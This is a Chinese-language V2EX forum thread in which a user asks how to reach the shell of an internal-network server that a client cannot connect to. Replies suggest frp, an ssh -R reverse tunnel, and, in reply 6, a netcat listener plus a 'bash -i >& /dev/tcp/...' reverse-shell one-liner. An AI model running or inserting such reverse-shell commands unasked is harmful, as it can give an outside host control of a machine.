V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
chackchackGO
V2EX  ›  问与答

有什么方法可以让 ssh 服务端主动暴露自己的 shell 给客户端?

  •  
  •   chackchackGO · 2023-03-16 19:54:38 +08:00 · 944 次点击
    这是一个创建于 624 天前的主题,其中的信息可能已经有所发展或是发生改变。
    就是说让服务端主动连接客户端, 而不是常规的客户端连接到服务端来获取服务端 shell.

    因为服务端在内网, 客户端无法主动连接到.

    我了解到了 ssh 反向隧道, 但是不知道如何开启出一个 shell.
    9 条回复    2023-03-17 23:16:02 +08:00
    hdp5252
        1
    hdp5252  
       2023-03-16 20:08:04 +08:00 via Android
    需要一个有外网 IP 的服务器,把内网服务器的 IP 映射到外网服务器的一个端口,然后应该就能连接了
    我以前试过,可以用
    dcsuibian
        2
    dcsuibian  
       2023-03-16 20:18:55 +08:00 via Android
    租云服务器用 frp
    ssh 的隧道是给其它程序借用的,而你是 ssh 本身就连不上
    chackchackGO
        3
    chackchackGO  
    OP
       2023-03-16 20:47:22 +08:00
    我实际情况是 要被暴露 shell 的服务端只有 ssh client 没有 ssh server, 所以我想让服务端用 ssh client 来主动连接客户端.
    那看来还是一定要安装 ssh server 了
    cxtrinityy
        4
    cxtrinityy  
       2023-03-16 20:57:30 +08:00 via Android
    ssh tunnel 就是端口映射,如果你想通过 tunnel 来保证客户端能和服务端建立连接,你可以在服务端调用如下命令:ssh -R 123:localhost:22 你的公网机子的 ip

    这样就会将公网机子的 123 端口收到的数据转发到服务端的 22 端口,也就是 ssh 监听的端口,然后客户端 ssh 到公网机子的 123 就会和服务端建立 ssh 连接

    还有一个更直接的概念叫 reverse shell ,这就是直接暴露 shell 的方法,原理是客户端监听一个端口,服务端连接该端口并将该端口收到的数据放到 shell 里执行
    loveqianool
        5
    loveqianool  
       2023-03-16 20:59:43 +08:00
    Web SSH & Telnet
    coolloves
        6
    coolloves  
       2023-03-17 16:10:58 +08:00
    客户端 cip 随便开端口
    nc -lvp 4444

    服务器上执行
    bash -i >& /dev/tcp/cip/4444 0>&1

    客户端上此时在终端中就可以操作服务端了
    chackchackGO
        7
    chackchackGO  
    OP
       2023-03-17 22:25:48 +08:00
    @coolloves 我看懂了一些, 但是您是不是少了几步?
    客户端监听了端口
    服务端调用了 socket
    但是两者还没连接啊, 彼此都还没搞清对方的地址?
    coolloves
        8
    coolloves  
       2023-03-17 23:12:00 +08:00   ❤️ 1
    @chackchackGO 试试不就知道啦.当执行了第二步后,所谓的反向链接,客户端的电脑上就可以执行服务器的命令了,搜下 shell 反弹,自行了解吧.
    chackchackGO
        9
    chackchackGO  
    OP
       2023-03-17 23:16:02 +08:00
    @coolloves 笨比了, 没意识到 cip 的意义
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1948 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 33ms · UTC 16:18 · PVG 00:18 · LAX 08:18 · JFK 11:18
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.